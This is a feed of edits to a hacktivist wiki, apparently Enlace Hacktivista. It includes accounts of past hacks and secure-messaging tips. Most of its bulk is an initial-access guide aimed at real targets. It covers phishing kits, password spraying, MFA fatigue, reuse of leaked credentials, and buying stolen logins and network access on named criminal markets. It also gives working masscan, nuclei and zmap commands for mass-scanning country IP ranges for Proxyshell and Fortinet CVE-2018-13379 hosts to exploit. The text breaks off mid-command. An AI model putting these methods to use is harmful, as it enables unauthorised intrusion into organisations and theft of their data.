<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://enlacehacktivista.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mxwgn</id>
	<title>Enlace Hacktivista - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://enlacehacktivista.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mxwgn"/>
	<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php/Special:Contributions/Mxwgn"/>
	<updated>2026-04-22T17:46:43Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.43.8</generator>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1720</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1720"/>
		<updated>2023-12-01T08:21:45Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email&lt;br /&gt;
* Probably the most mature jabber client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* https://www.thunderbird.net A email client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]&lt;br /&gt;
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the whonix wiki].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1719</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1719"/>
		<updated>2023-12-01T08:19:21Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted e-mail&lt;br /&gt;
* Probably the most mature jabber client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* https://www.thunderbird.net A email client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]&lt;br /&gt;
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the whonix wiki].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1718</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1718"/>
		<updated>2023-12-01T08:19:07Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email&lt;br /&gt;
* Probably the most mature jabber client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* https://www.thunderbird.net A email client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]&lt;br /&gt;
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the whonix wiki].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Freedom_Hosting_II&amp;diff=1717</id>
		<title>Freedom Hosting II</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Freedom_Hosting_II&amp;diff=1717"/>
		<updated>2023-11-27T08:32:31Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;Freedom Hosting II&#039;&#039;&#039; (popularly, FreedomHII or FHII), is a &#039;&#039;free anonymous hosting service&#039;&#039;, with PHP/MySQL support, FTP, unlimited traffic and other features. A successor to Freedom Hosting, it was responsible for hosting 15-20% of active websites, in the [https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/ september 2016, OnionScan Project ScanList (.press)].&lt;br /&gt;
	&lt;br /&gt;
FHII hosted everything from personal or collective websites and blogs, to forums, cryptocurrency wallet websites, and even, inappropriate or illegal content. &lt;br /&gt;
	&lt;br /&gt;
== Downfall of Freedom Hosting II ==&lt;br /&gt;
&lt;br /&gt;
The hosting of child pornography is what led to the downfall of FHII. Despite the clear rule about &amp;quot;zero tolerance for child pornography,&amp;quot; the hosting of the main site about it, Lolita City, triggered Operation DarkNet&#039;s focus on the service. According to the statement posted on the homepage at the time, more than 50% child pornography was found on the server.&lt;br /&gt;
	&lt;br /&gt;
Carried out on behalf of Anonymous, the Hackers&#039; actions during the invasion were described separately. These being:&lt;br /&gt;
	&lt;br /&gt;
# The invasion and takeover of the server Hacker(s) take control of the service, in addition to making the publication on the front page, officially.&lt;br /&gt;
# Added the contact e-mail, in case the party is interested in contacting you.&lt;br /&gt;
# Database dump added&lt;br /&gt;
# Added instructions, on how to get access to the system.&lt;br /&gt;
# Added system files (possibly for recovery).&lt;br /&gt;
&lt;br /&gt;
=== Images ===&lt;br /&gt;
# [https://video-images.vice.com/_uncategorized/1486233091715-Screenshot-from-2017-02-04-18-16-16.png Home page image]&lt;br /&gt;
# [https://video-images.vice.com/_uncategorized/1486233191971-meethod.jpeg Image alleging the method of invasion]&lt;br /&gt;
&lt;br /&gt;
=== References ===&lt;br /&gt;
# [https://www.vice.com/en/article/d7x47m/talking-to-the-hacker-who-took-down-a-fifth-of-the-dark-web Vice, Motherboard (.com)]&lt;br /&gt;
# [http://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad.onion/wiki/Freedom_Hosting The Hidden Wiki | About Freedom Hosting (.onion)]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Roskomnadzor&amp;diff=1716</id>
		<title>Roskomnadzor</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Roskomnadzor&amp;diff=1716"/>
		<updated>2023-11-27T08:30:34Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hack of over 360,000 files or 820GB of data from the Russian Federal Service for Supervision of Communications, Information Technology and Mass Media, commonly known as Roskomnadzor. the government agency responsible for monitoring, controlling and censoring Russian mass media and the internet.&lt;br /&gt;
&lt;br /&gt;
https://ddosecrets.com/wiki/Roskomnadzor&lt;br /&gt;
&lt;br /&gt;
The hacker who identified themselves only as being part of the hacktivist collective Anonymous stated that they urgently felt the Russian people should have access to information about their government&#039;s involvement in the Russo-Ukrainian War. They also expressed their opposition to the Russian people being cut off from independent media and the outside world.&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
According to the hacker:&lt;br /&gt;
 I found a mailserver that had the word Roskomnadzor in the SMTP banner. I checked what&#039;s on the same /24 subnet and found a Windows 2008 domain controller. With a public IP address. I tried zerologon and it worked. Then I copied all of the files that were on a fileserver on the local network.&lt;br /&gt;
See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#zerologon PayloadsAllTheThings] for a reference on testing for and exploiting zerologon.&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
* https://www.vice.com/en/article/xgdmj7/russian-censorship-roskomnadzor-hacked-leak-distributed-denial-of-secrets&lt;br /&gt;
* https://torrentfreak.com/anonymous-hacks-russias-roscomnadzor-site-blocking-agency-220311/&lt;br /&gt;
* https://www.nytimes.com/interactive/2022/09/22/technology/russia-putin-surveillance-spying.html&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Sons_of_Confederate_Veterans&amp;diff=1715</id>
		<title>Sons of Confederate Veterans</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Sons_of_Confederate_Veterans&amp;diff=1715"/>
		<updated>2023-11-27T08:25:09Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hack of website of the U.S, neo-confederate organization, Sons of Confederate Veterans exposing names, addresses, telephone numbers and e-mail addresses of almost 59,000 past and present members.&lt;br /&gt;
&lt;br /&gt;
[https://www.theguardian.com/us-news/2021/jun/28/neo-confederate-group-members-politicians-military-officers Revealed: neo-Confederate group includes military officers and politicians] (The Guardian)&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
The organization’s website had been misconfigured, allowing access to membership rolls, recruiting data, and other information about the internal workings of the group. The website has had the security issue for a number of years, according to the hacktivist.&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Sons_of_Confederate_Veterans&amp;diff=1714</id>
		<title>Sons of Confederate Veterans</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Sons_of_Confederate_Veterans&amp;diff=1714"/>
		<updated>2023-11-27T08:24:51Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: mini fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hack of website of the U.S, neo-confederate organization Sons of Confederate Veterans exposing names, addresses, telephone numbers and e-mail addresses of almost 59,000 past and present members.&lt;br /&gt;
&lt;br /&gt;
[https://www.theguardian.com/us-news/2021/jun/28/neo-confederate-group-members-politicians-military-officers Revealed: neo-Confederate group includes military officers and politicians] (The Guardian)&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
The organization’s website had been misconfigured, allowing access to membership rolls, recruiting data, and other information about the internal workings of the group. The website has had the security issue for a number of years, according to the hacktivist.&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Cloud_Hacking&amp;diff=1713</id>
		<title>Cloud Hacking</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Cloud_Hacking&amp;diff=1713"/>
		<updated>2023-11-27T08:23:04Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: mini fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Amazon - AWS ==&lt;br /&gt;
* https://hackingthe.cloud/aws/general-knowledge/aws_organizations_defaults&lt;br /&gt;
&lt;br /&gt;
== Microsoft - Azure ==&lt;br /&gt;
* https://hackingthe.cloud/azure/abusing-managed-identities&lt;br /&gt;
* https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html&lt;br /&gt;
* https://blog.xpnsec.com/azuread-connect-for-redteam&lt;br /&gt;
* AAD Connect Cloud Sync: as local admin impersonate or retrieve managed password of the provagentgMSA account to dcsync.&lt;br /&gt;
** see: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#reading-gmsa-password&lt;br /&gt;
* https://www.blackhillsinfosec.com/webcast-getting-started-in-pentesting-the-cloud-azure&lt;br /&gt;
* https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md&lt;br /&gt;
* https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html&lt;br /&gt;
&lt;br /&gt;
=== Microsoft Office 365 - o365 ===&lt;br /&gt;
* Extremely in-depth technical info on everything https://o365blog.com&lt;br /&gt;
&lt;br /&gt;
== Google Cloud Platform - GCP ==&lt;br /&gt;
* https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security&lt;br /&gt;
* https://hackingthe.cloud/gcp/general-knowledge/client-credential-search-order&lt;br /&gt;
&lt;br /&gt;
== Cloud Hacking Tools ==&lt;br /&gt;
* https://github.com/nyxgeek/o365recon - Retrieve information via O365 and AzureAD with a valid cred &lt;br /&gt;
* https://github.com/dirkjanm/ROADtools - A collection of Azure AD tools for offensive and defensive security purposes &lt;br /&gt;
* https://github.com/fox-it/adconnectdump - Dump Azure AD Connect credentials for Azure AD and Active Directory &lt;br /&gt;
* https://github.com/LMGsec/o365creeper - Python script that performs e-mail address validation against Office 365 without submitting login attempts. &lt;br /&gt;
* https://github.com/rvrsh3ll/TokenTactics - Azure JWT Token Manipulation Toolset &lt;br /&gt;
* https://github.com/nyxgeek/onedrive_user_enum - OneDrive user enumeration - pentest tool to enumerate valid o365 users &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365)&lt;br /&gt;
* https://github.com/dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1712</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1712"/>
		<updated>2023-11-27T08:22:01Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: mini fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
